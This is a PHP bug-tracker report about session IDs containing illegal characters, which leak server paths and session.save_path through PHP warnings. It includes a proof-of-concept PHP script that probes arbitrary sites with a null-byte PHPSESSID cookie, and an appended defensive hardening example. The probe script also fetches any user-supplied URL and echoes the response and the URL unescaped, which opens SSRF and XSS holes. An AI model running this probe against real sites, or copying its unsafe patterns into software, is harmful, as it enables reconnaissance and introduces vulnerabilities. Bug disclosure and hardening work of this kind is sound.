ID:               42310
 Updated by:       [EMAIL PROTECTED]
 Reported By:      astalor at gmail dot com
-Status:           Open
+Status:           Feedback
 Bug Type:         Session related
 Operating System: ALL
 PHP Version:      5.2.4RC1
 New Comment:

Please try using this CVS snapshot:

  http://snaps.php.net/php5.2-latest.tar.gz
 
For Windows (zip):
 
  http://snaps.php.net/win32/php5.2-win32-latest.zip

For Windows (installer):

  http://snaps.php.net/win32/php5.2-win32-installer-latest.msi




Previous Comments:
------------------------------------------------------------------------

[2007-08-15 13:28:54] astalor at gmail dot com

Description:
------------
If you put an invalid symbol in the session ID and PHP warnings are
turned on, you can retrieve information about files and paths on the
server and also, in some cases, the configured session.save_path
variable from PHP.INI. This can display warnings (and sometimes break
pages that count on redirection with header()) on pages that are
perfectly correct and without any errors in them.

Reproduce code:
---------------
<?php
/* This script checks if PHP warnings are enabled for the targeted website */
function checkWarnings($url) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_TIMEOUT, 2);
        // Session cookie carrying a character outside the valid set
        curl_setopt($ch, CURLOPT_COOKIE, "PHPSESSID=\0");
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_HEADER, 1);
        $output = curl_exec($ch);
        curl_close($ch);

        // Collect rendered warnings and the save path quoted in the message
        preg_match_all("/<b>Warning<\/b>:(.*)<br \/>/i", $output, $match);
        preg_match_all("/session.save_path is correct \((.*)\)/i", $output, $path);
        #echo $output;
        echo "<pre>";
        echo "Checking <b>$url</b>\n";
        if (count($match[0]) > 0) {
                echo "<b>Warnings found</b>:\n";
                echo implode("\n", $match[0]);
        } else {
                echo "Warnings are <b>disabled</b>\n";
        }
        // isset() avoids a notice when the debug parameter is not supplied
        if (isset($_GET['debug']) && $_GET['debug'] == 1) {
                echo "<b>Displaying page:</b>\n";
                echo $output;
        }
        #print_r($path);
}
checkWarnings($_GET['url']);
?>

Expected result:
----------------
Warning:  session_start() [function.session-start]: The session id
contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,'
in /home/user/public_html/main/file.php on line 32
Warning:  Unknown: Failed to write session data (files). Please verify
that the current setting of session.save_path is correct (/tmp) in
Unknown on line 0


Actual result:
--------------
The same as the expected result, as long as PHP warnings are enabled


------------------------------------------------------------------------


-- 
Edit this bug report at http://bugs.php.net/?id=42310&edit=1
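
A defensive counterpart to the report above, as an added example that is not part of the original bug report or of PHP itself: it keeps warnings out of the response and validates the session cookie against the character set named in the warning before session_start() runs. The helper names, the 128-character cap and the use of random_bytes() (PHP 7+) are assumptions of this sketch.

```php
<?php
// Added example (assumes PHP 7+ for random_bytes); helper names are hypothetical.

// Keep warnings out of the response: script paths and session.save_path
// are then written to the error log instead of being sent to the client.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// True only for IDs built from the characters the warning lists as valid
// (a-z, A-Z, 0-9, '-' and ','). The 128-character cap is an assumption.
function is_valid_session_id($id)
{
    return is_string($id)
        && preg_match('/\A[A-Za-z0-9,-]{1,128}\z/', $id) === 1;
}

// Start the session without ever handing a malformed client-supplied ID
// to session_start(); a malformed ID is replaced by a fresh random one.
function safe_session_start()
{
    $name = session_name();
    $supplied = isset($_COOKIE[$name]) ? $_COOKIE[$name] : null;

    if ($supplied !== null && !is_valid_session_id($supplied)) {
        error_log('Rejected malformed session ID from '
            . (isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : 'unknown'));
        // An ID set explicitly before session_start() takes precedence
        // over the one sent in the request.
        session_id(bin2hex(random_bytes(16)));
    }
    return session_start();
}

safe_session_start();
```

The rejected-ID log line also gives operations a signal to alert on, since well-behaved clients never send a session ID outside that character set.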
